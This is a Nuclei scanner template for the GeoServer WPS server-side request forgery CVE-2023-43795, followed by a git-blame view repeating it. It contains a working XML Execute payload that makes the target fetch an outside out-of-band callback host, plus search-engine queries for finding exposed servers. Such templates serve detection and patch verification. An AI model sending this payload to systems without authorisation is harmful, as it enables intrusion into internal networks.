nuclei-templates/http/cves/2023/CVE-2023-43795.yaml

id: CVE-2023-43795

info:
  name: GeoServer WPS - Server Side Request Forgery
  author: DhiyaneshDK
  severity: critical
  description: |
    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
  reference:
    - https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43795
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43795
    cwe-id: CWE-918
    epss-score: 0.12207
    epss-percentile: 0.94786
    cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: osgeo
    product: geoserver
    shodan-query: title:"GeoServer"
    fofa-query: app="GeoServer"
  tags: cve,cve2023,geoserver,ssrf,oast,oos
variables:
  oast: "{{interactsh-url}}"
  string: "{{to_lower(rand_text_alpha(4))}}"
  value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <wps:Execute version="1.0.0" service="WPS"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xmlns="http://www.opengis.net/wps/1.0.0"
          xmlns:wfs="http://www.opengis.net/wfs"
          xmlns:wps="http://www.opengis.net/wps/1.0.0"
          xmlns:ows="http://www.opengis.net/ows/1.1"
          xmlns:gml="http://www.opengis.net/gml"
          xmlns:ogc="http://www.opengis.net/ogc"
          xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
          xmlns:xlink="http://www.w3.org/1999/xlink"
                xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
          <ows:Identifier>JTS:area</ows:Identifier>
          <wps:DataInputs>
            <wps:Input>
              <ows:Identifier>geom</ows:Identifier>
              <wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
                <wps:Header key="{{string}}" value="{{value}}"/>
              </wps:Reference>
            </wps:Input>
          </wps:DataInputs>
          <wps:ResponseForm>
            <wps:RawDataOutput>
              <ows:Identifier>result</ows:Identifier>
            </wps:RawDataOutput>
          </wps:ResponseForm>
        </wps:Execute>

    payloads:
      path:
        - /wms
        - /geoserver/wms

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
          - status_code == 200
        condition: and

# digest: 4a0a00473045022062f2b8599972cbe2e0250d9268e1362749b6315db9addc45852a1a6d8eb1bc6f022100b9121689ee9192454a6a788523a68274865c01e0bead530f589c94117db533d4:922c64590222798bb761d5b6d8e72950
Added CVE-2023-43795 (GeoServer WPS - Server Side Request Forgery) 🔥 (#8522) * Create CVE-2023-41339.yaml * lint fix * cve id update --------- Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-11-02 13:53:59 +00:00			`id: CVE-2023-43795`

			`info:`
			`name: GeoServer WPS - Server Side Request Forgery`
			`author: DhiyaneshDK`
			`severity: critical`
			`description: \|`
			`GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.`
			`reference:`
			`- https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html`
			`- https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-43795`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2023-43795`
			`cwe-id: CWE-918`
TemplateMan Update [Fri Nov 3 15:51:18 UTC 2023] :robot: 2023-11-03 15:51:18 +00:00			`epss-score: 0.12207`
TemplateMan Update [Sun Nov 5 22:23:39 UTC 2023] :robot: 2023-11-05 22:23:39 +00:00			`epss-percentile: 0.94786`
Added CVE-2023-43795 (GeoServer WPS - Server Side Request Forgery) 🔥 (#8522) * Create CVE-2023-41339.yaml * lint fix * cve id update --------- Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-11-02 13:53:59 +00:00			`cpe: cpe:2.3:a:osgeo:geoserver::::::::`
			`metadata:`
			`verified: true`
			`max-request: 2`
			`vendor: osgeo`
			`product: geoserver`
			`shodan-query: title:"GeoServer"`
			`fofa-query: app="GeoServer"`
			`tags: cve,cve2023,geoserver,ssrf,oast,oos`
			`variables:`
			`oast: "{{interactsh-url}}"`
			`string: "{{to_lower(rand_text_alpha(4))}}"`
			`value: "{{to_lower(rand_text_alpha(5))}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST {{path}} HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/xml`

			`<?xml version="1.0" encoding="UTF-8"?>`
			`<wps:Execute version="1.0.0" service="WPS"`
			`xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"`
			`xmlns="http://www.opengis.net/wps/1.0.0"`
			`xmlns:wfs="http://www.opengis.net/wfs"`
			`xmlns:wps="http://www.opengis.net/wps/1.0.0"`
			`xmlns:ows="http://www.opengis.net/ows/1.1"`
			`xmlns:gml="http://www.opengis.net/gml"`
			`xmlns:ogc="http://www.opengis.net/ogc"`
			`xmlns:wcs="http://www.opengis.net/wcs/1.1.1"`
			`xmlns:xlink="http://www.w3.org/1999/xlink"`
			`xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">`
			`<ows:Identifier>JTS:area</ows:Identifier>`
			`<wps:DataInputs>`
			`<wps:Input>`
			`<ows:Identifier>geom</ows:Identifier>`
			`<wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">`
			`<wps:Header key="{{string}}" value="{{value}}"/>`
			`</wps:Reference>`
			`</wps:Input>`
			`</wps:DataInputs>`
			`<wps:ResponseForm>`
			`<wps:RawDataOutput>`
			`<ows:Identifier>result</ows:Identifier>`
			`</wps:RawDataOutput>`
			`</wps:ResponseForm>`
			`</wps:Execute>`

			`payloads:`
			`path:`
			`- /wms`
			`- /geoserver/wms`

			`stop-at-first-match: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- contains(interactsh_protocol, 'http')`
			`- contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')`
			`- status_code == 200`
			`condition: and`
TemplateMan Update [Mon Nov 6 09:19:20 UTC 2023] :robot: 2023-11-06 09:19:20 +00:00
			`# digest: 4a0a00473045022062f2b8599972cbe2e0250d9268e1362749b6315db9addc45852a1a6d8eb1bc6f022100b9121689ee9192454a6a788523a68274865c01e0bead530f589c94117db533d4:922c64590222798bb761d5b6d8e72950`